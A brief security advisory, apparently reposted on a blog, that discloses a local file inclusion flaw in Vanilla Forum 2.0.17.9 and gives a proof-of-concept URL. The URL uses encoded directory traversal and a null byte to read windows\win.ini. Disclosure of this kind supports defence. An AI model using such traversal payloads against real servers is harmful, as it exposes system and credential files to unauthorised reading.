Vanilla Forum 2.0.17.9 LFI Vulnerability

———————————————————————— 

Software…………….Vanilla Forum 2.0.17.9 

Vulnerability………..Local File Inclusion 

Threat Level…………Critical (4/5) 

Download…………….http://www.vanillaforums.com/ 

Discovery Date……….5/15/2011 

Tested On……………Windows Vista + XAMPP 

———————————————————————— 

Author………………AutoSec Tools 

Site………………..http://www.autosectools.com/ 

Email……………….John Leitch <john@autosectools.com> 

———————————————————————— 

  

  

–Description– 

  

A local file inclusion vulnerability in Vanilla Forum 2.0.17.9 can be 

exploited to include arbitrary files. 

  

  

–PoC– 

  

http://localhost/vanilla/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00

 

 

发表评论?

0 条评论。

发表评论